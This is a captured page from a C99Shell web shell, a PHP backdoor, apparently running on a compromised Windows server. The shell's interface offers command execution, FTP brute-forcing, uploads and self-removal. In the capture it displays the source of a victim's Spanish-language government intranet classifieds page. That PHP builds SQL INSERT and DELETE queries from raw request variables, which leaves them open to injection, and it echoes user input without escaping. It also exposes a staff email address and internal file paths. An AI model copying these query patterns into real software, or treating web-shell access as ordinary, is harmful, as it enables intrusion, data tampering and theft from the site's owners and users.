!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\Extranet\phpscripts\   drwxrwxrwx
Free 4.13 GB of 39.52 GB (10.45%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     clasi2.php (16.21 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
    $accion 
= isset($acc);
    
// 1. Adición de Clasificados
    
if ($accion == true) {
        if (
$acc == 1) {
            require(
'hoyformat.php');
            require(
'conexion3.php');
            
$query ="INSERT INTO clasificados VALUES('','$user','$titulo','$mensaje','$fecha','$cid')";
            
$result mysql_query($query,$db);
        }
        if (
$acc == 2) {
            require(
'conexion3.php');
            
$query ="DELETE from clasificados where id=$id";
            
$result mysql_query($query,$db);
        }
    }
?>



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>mi DAMA</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
body,td,th {
    font-family: Verdana, Arial, Helvetica, sans-serif;
    font-size: 10px;
    color: #000000;
}
body {
    background-color: #333333;
}
.Estilo5 {
    color: #FFFFFF;
    font-weight: bold;
}
a:link {
    color: #333333;
    text-decoration: none;
}
a:visited {
    color: #333333;
    text-decoration: none;
}
a:active {
    color: #FF3300;
    text-decoration: none;
}
a:hover {
    text-decoration: underline;
}
.Estilo48 {font-size: 18}
.Estilo49 {font-size: 12px}
.Estilo54 {font-family: Verdana, Arial, Helvetica, sans-serif}
.Estilo55 {font-size: 12}
.style1 {color: #999999}
.style2 {
    color: #FFFFFF;
    font-size: 20px;
}
input {
    font-family: Verdana, Arial, Helvetica, sans-serif;
    font-size: 10px;
    color: #666666;
    background-color: #F3F3F3;
    border: 1px solid #33CCFF;
}
-->
</style>
<script language="JavaScript" type="text/JavaScript">
<!--
function MM_preloadImages() { //v3.0
  var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();
    var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++)
    if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}}
}

function MM_swapImgRestore() { //v3.0
  var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc;
}

function MM_findObj(n, d) { //v4.01
  var p,i,x;  if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) {
    d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);}
  if(!(x=d[n])&&d.all) x=d.all[n]; for (i=0;!x&&i<d.forms.length;i++) x=d.forms[i][n];
  for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers[i].document);
  if(!x && d.getElementById) x=d.getElementById(n); return x;
}

function MM_swapImage() { //v3.0
  var i,j=0,x,a=MM_swapImage.arguments; document.MM_sr=new Array; for(i=0;i<(a.length-2);i+=3)
   if ((x=MM_findObj(a[i]))!=null){document.MM_sr[j++]=x; if(!x.oSrc) x.oSrc=x.src; x.src=a[i+2];}
}
//-->
</script>
<script language="JavaScript" type="text/JavaScript">
<!--
function MM_reloadPage(init) {  //reloads the window if Nav4 resized
  if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
    document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
  else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
}
MM_reloadPage(true);

function MM_jumpMenu(targ,selObj,restore){ //v3.0
  eval(targ+".location='"+selObj.options[selObj.selectedIndex].value+"'");
  if (restore) selObj.selectedIndex=0;
}
//-->
</script>
<style type="text/css">
<!--
.tabla1 {
    border: 1px none #CCCCCC;
}
textarea {
    font-family: Verdana, Arial, Helvetica, sans-serif;
    font-size: 10px;
    color: #666666;
    border: 1px solid #33CCFF;
}
select {
    font-family: Verdana, Arial, Helvetica, sans-serif;
    font-size: 10px;
    color: #333333;
    background-color: #F3F3F3;
    border: 1px solid #66CCFF;
}
-->
</style>
<style type="text/css">
<!--
button {
    font-family: Verdana, Arial, Helvetica, sans-serif;
    font-size: 10px;
    color: #666666;
    background-color: #9FEDFD;
}
-->
</style>
</head>
<body onload="MM_preloadImages('../../../Documents%20and%20Settings/nicrey/Desktop/Nicolas%20Rey%20G/Intranet/sinestesia/MiDAMA_RO_002.jpg','../../../Documents%20and%20Settings/nicrey/Desktop/Nicolas%20Rey%20G/Intranet/sinestesia/BogBann_E05b.jpg','../../../Documents%20and%20Settings/nicrey/Desktop/Nicolas%20Rey%20G/Intranet/sinestesia/Intra_dam01b.jpg','../../../Documents%20and%20Settings/nicrey/Desktop/Nicolas%20Rey%20G/Intranet/madam/mima/atardecercosmico_02b.jpg','../../../Documents%20and%20Settings/nicrey/Desktop/Nicolas%20Rey%20G/Intranet/madam/mima/atardecercosmico_03b.jpg','../../../Documents%20and%20Settings/nicrey/Desktop/Nicolas%20Rey%20G/Intranet/madam/mima/atardecercosmico_04b.jpg','../../../Documents%20and%20Settings/nicrey/Desktop/Nicolas%20Rey%20G/Intranet/madam/mima/BogBann_D02.jpg')">
<div align="center"> <img src="midama3_files/BogBann_D02.jpg" height="120" width="760"></div>
<table align="center" border="0" cellpadding="0" cellspacing="0" width="760">
  <tbody>
    <tr bgcolor="#c55a24"> 
      <td colspan="2"> 
        <table width="90%" border="0" cellspacing="0" cellpadding="4">
          <tr> 
            <td width="15%" bgcolor="#FFFFFF">
<div align="center"><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><a href="reqintranet.php?user=<?php echo $user?>">INICIO</a></font></div></td>
            <td width="15%" bgcolor="#FFFF66">
<div align="center"><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><span class="Estilo48"><a href="reqnew2.php?user=<?php echo $user?>">M&Aacute;S 
                NOTICIAS</a></span></font></div></td>
            <td width="15%" bgcolor="#FFCC00">
<div align="center"><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><a href="reqsistemas1.php">SOPORTE</a><span class="Estilo48"></span></font></div></td>
            <td width="15%" bgcolor="#FF9966">
<div align="center"><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><span class="Estilo48"><a href="reqlegis.php">LEGISLACIÓN</a></span></font></div></td>
            <td width="15%" bgcolor="#FF6633"><div align="center"><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><span class="Estilo48"><a href="reqdoc.php">DOCUMENTACIÓN</a></span></font></div></td>
            <td width="15%" bgcolor="#c55a24">&nbsp;</td>
          </tr>
        </table>
      </td>
    </tr>
    <tr> 
      <td bgcolor="#99cd00" width="568"> </td>
      <td bgcolor="#99cd00" width="192"> </td>
    </tr>
  </tbody>
</table>
<table align="center" border="0" cellpadding="0" cellspacing="0" width="760">
  <tbody>
    <tr>
      <td rowspan="2" align="center" bgcolor="#1B7BAF" valign="top" width="568">
<table width="100%" border="0" cellspacing="0" cellpadding="6">
          <tr bgcolor="#A7FAFE"> 
            <td><div align="center"><img src="clasi.gif" width="327" height="37"></div></td>
          </tr>
          <tr> 
            <td><table width="100%" border="0" cellpadding="2" cellspacing="0">
                <tr valign="middle"> 
                  <td>
                  <?php
                  $categoria 
= isset($cat);
                  if (
$categoria == false) {
                      
$cat_s 0;    
                  }else{
                      
$cat_s $cat;
                  }
                  
?>
                   <form name="form2">
                      <div align="left"> <font color="#FFFFFF">Categor&iacute;a:<br>
                        </font><br>
                        <select name="menu1" onChange="MM_jumpMenu('parent',this,0)">
                        <option value="#">Seleccione una...</option>
                        <?php
                  
require('conexion3.php');
                
$consul "SELECT *
                FROM cate_cla"
;
                
$result mysql_query($consul,$db);
                
$num_filas mysql_num_rows($result);
                while (
$myrow mysql_fetch_array($result))
                {
                
$c_id $myrow["id"];
                
$c_name $myrow["nombre"];
                if (
$c_id == $cat_s) {
                
?>
                  <option value="reqintranetclasi.php?cat=<?php echo $c_id?>&user=<?php echo $user?>" selected><?php echo $c_name?></option>
                  <?php }else{ ?>
                  <option value="reqintranetclasi.php?cat=<?php echo $c_id?>&user=<?php echo $user?>"><?php echo $c_name?></option>
                <?php }} ?>
                        </select>
                      </div>
                    </form></td>
                  <td rowspan="2" valign="top"> <table width="100%" border="0" cellspacing="0" cellpadding="12">
                      <tr> 
                        <td><div align="left"><font color="#FFFFFF">Los mensajes 
                            o avisos publicados en esta secci&oacute;n, no representan 
                            de forma alguna la opini&oacute;n de la entidad. De 
                            la misma forma el DAMA no se responsabiliza de la 
                            seriedad de los mismos y en ningun momento los recomienda 
                            u obliga.</font></div></td>
                      </tr>
                    </table></td>
                </tr>
                <tr valign="middle"> 
                  <td>&nbsp; </td>
                </tr>
              </table></td>
          </tr>
          <tr> 
            <td align="left"><font color="#1B7BAF">aa</font> 
              <div id="Layer1" style="position:absolute; width:500px; height:240px; z-index:1; overflow: auto; visibility: visible;"> 
                <table width="95%" border="0" cellspacing="0" cellpadding="6">
                  <tr>
                  <?php
                      $inicio 
= isset($ini);
                    if (
$inicio == false) {
                        
$ini 0;
                    }
                    
$lim $ini 25;
                                  
                      require(
'conexion3.php');
                    if (
$cat_s != 0) {
                        
$consul "SELECT *
                        FROM clasificados where cate_id=
$cat_s order by fecha DESC";
                    }else{
                        
$consul "SELECT *
                        FROM clasificados order by fecha DESC"
;
                    }
                    
$result mysql_query($consul,$db);
                    
$num_filas mysql_num_rows($result);
                  
?> 
                    <td bgcolor="#66CCFF">ULTIMOS AVISOS</td>
                    <td bgcolor="#66CCFF"><div align="right"><?php echo $num_filas?> 
                        Avisos
                        <?php if ($num_filas $lim) { ?>
                        , <a href="#">Ver m&aacute;s...</a>
                        <?php ?>
                        </div></td>
                  </tr>
                  <?php
                
require('conexion3.php');
                if (
$cat_s != 0) {
                    
$consul "SELECT *
                    FROM clasificados where cate_id=
$cat_s order by fecha DESC limit $ini,25";
                }else{
                    
$consul "SELECT *
                    FROM clasificados order by fecha DESC limit 
$ini,25";
                }
                
$result mysql_query($consul,$db);
                
$num_filas mysql_num_rows($result);
                  while (
$myrow mysql_fetch_array($result))
                {
                
$tid $myrow["id"];
                
$tit $myrow["titulo"];
                
$tex $myrow["texto"];
                
$fec $myrow["fecha"];
                
?>
                  <tr> 
                    <td colspan="2"><div align="left"><font color="#A7FAFE"><strong><?php echo $tit?></strong></font> 
                        <font color="#999999">(<font color="#CCCCCC"><?php echo $fec?></font>)</font> 
                        <?php if ($user == "EMAIL" or $user == "CARNEI") { ?>(<a href="reqintranetclasi.php?user=<?php echo $user?>&acc=2&id=<?php echo $tid?>">X</a>)<?php ?><br>
                        <font color="#FFFFFF"><?php echo $tex?></font> </div></td>
                  </tr>
                  <?php ?>
                </table>
              </div></td>
          </tr>
        </table>
        <blockquote>
          <blockquote>&nbsp; </blockquote>
        </blockquote></td>
      <td width="193" height="55" align="left" valign="top" bgcolor="#666666"> 
        <form name="form1" method="post" action="">
          <table width="100%" border="0" cellspacing="0" cellpadding="6">
            <tr bgcolor="#33CCFF"> 
              <td><font color="#000000" size="1" face="Verdana, Arial, Helvetica, sans-serif">AGREGAR 
                UN NUEVO AVISO</font></td>
            </tr>
            <tr>
              <td>
              <?php
              
if ($user == "guest") {?>
                <div id="Layer2" style="position:absolute; width:179px; height:115px; z-index:2; background-image: url(fgris.gif); layer-background-image: url(fgris.gif);"> 
                  <table width="100%" border="0" cellpadding="8" cellspacing="0" background="fgris.gif">
                    <tr>
                      <td><p><font color="#CCCCCC">Regrese a la p&aacute;gina 
                          anterior, ingrese su nombre de usuario y clave en la 
                          secci&oacute;n de herramientas. </font></p>
                        <p><font color="#CCCCCC">De esta forma podr&aacute; volver 
                          a esta p&aacute;gina y agregar un aviso a la cartelera.</font></p></td>
                    </tr>
                  </table>
                </div>
                <p>&nbsp;</p>
                <p>&nbsp;</p>
                <p>&nbsp;</p><?php ?></td>
            </tr>
            <tr> 
              <td><div align="center"><font color="#FFFFFF">T&iacute;tulo:</font> 
                  <?php if ($user != "guest") { ?>
                  <input name="titulo" type="text" id="titulo" size="17">
                  <?php ?>
                </div></td>
            </tr>
            <tr> 
              <td><div align="center"> 
               <?php if ($user != "guest") { ?>
                  <select name="cid" id="cid">
                    <option>Seleccione Categoria</option>
                    <?php
                    
if ($user != "guest") {
                  require(
'conexion3.php');
                
$consul "SELECT *
                FROM cate_cla"
;
                
$result mysql_query($consul,$db);
                
$num_filas mysql_num_rows($result);
                while (
$myrow mysql_fetch_array($result))
                {
                
$c_id $myrow["id"];
                
$c_name $myrow["nombre"];
                
?>
                    <option value="<?php echo $c_id?>"><?php echo $c_name?></option>
                    <?php }} ?>
                  </select><?php ?>
                </div></td>
            </tr>
            <tr> 
              <td><div align="center"> 
                  <?php if ($user != "guest") { ?>
                  <textarea name="mensaje" cols="24" id="mensaje">Aqui va su mensaje...</textarea>
                  <?php ?>
                </div></td>
            </tr>
            <tr> 
              <td><div align="right"></div>
                <div align="center"> 
                <?php if ($user != "guest") { ?>
                  <input type="submit" name="Submit" value="Publicar Mensaje">
                  <input name="acc" type="hidden" id="acc" value="1">
                  <input name="user" type="hidden" id="user" value="<?php echo $user?>">
                  <?php ?>
                </div></td>
            </tr>
          </table>
        </form></td>
    </tr>
    <tr> 
      <td align="left" bgcolor="#006699" height="12" valign="top"><table width="100%" border="0" cellspacing="0" cellpadding="6">
          <tr> 
            <td bgcolor="#ffcc00">CONDICIONES DE PUBLICACI&Oacute;N</td>
          </tr>
          <tr> 
            <td bgcolor="#999999"><p><font color="#FFFFFF"><strong>1.</strong> 
                Los mensajes ingresados estar&aacute;n sujetos a ser removidos 
                si hacen referencia a alguna actividad ilegal o si &eacute;stos 
                usan lenguaje inapropiado.</font></p>
              <p><font color="#FFFFFF"><strong>2.</strong> No se podr&aacute;n 
                ingresar mensajes de m&aacute;s de 50 palabras.</font></p>
              <p><font color="#FFFFFF"><strong>3.</strong> Si usted no encuentra 
                la categor&iacute;a apropiada dentro de las disponibles por favor 
                envienos su requerimiento a: <a href="mailto:carlosneira@dama.gov.co">carlosneira@dama.gov.co</a></font></p></td>
          </tr>
        </table></td>
    </tr>
  </tbody>
</table>
<table align="center" border="0" cellpadding="0" cellspacing="0" width="760">
  <tbody><tr bgcolor="#003399">
    <td bgcolor="#666666" height="46" width="566"><div class="Estilo14 style1" align="center">diseño: alvaro moreno - desarrollo: nicolás rey </div></td>
    <td bgcolor="#fee415" width="194"><div align="center"> 
          <p><img src="midama3_files/logyell.jpg" width="156" height="57"></p>
    </div></td>
  </tr>
</tbody></table>
<table align="center" border="0" cellpadding="0" cellspacing="0" width="760">
  <tbody><tr bgcolor="#003399">
    <td bgcolor="#ffcc00" width="567"><div align="center"><span class="Estilo5"><a href="http://midama.blogspot.com/">mi 
          DAMA </a><a href="http://midama.blogspot.com/">WEBLOG</a></span></div></td>
    <td bgcolor="#ff3300" width="193"> </td>
  </tr>
</tbody></table>
</body></html>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0936 ]--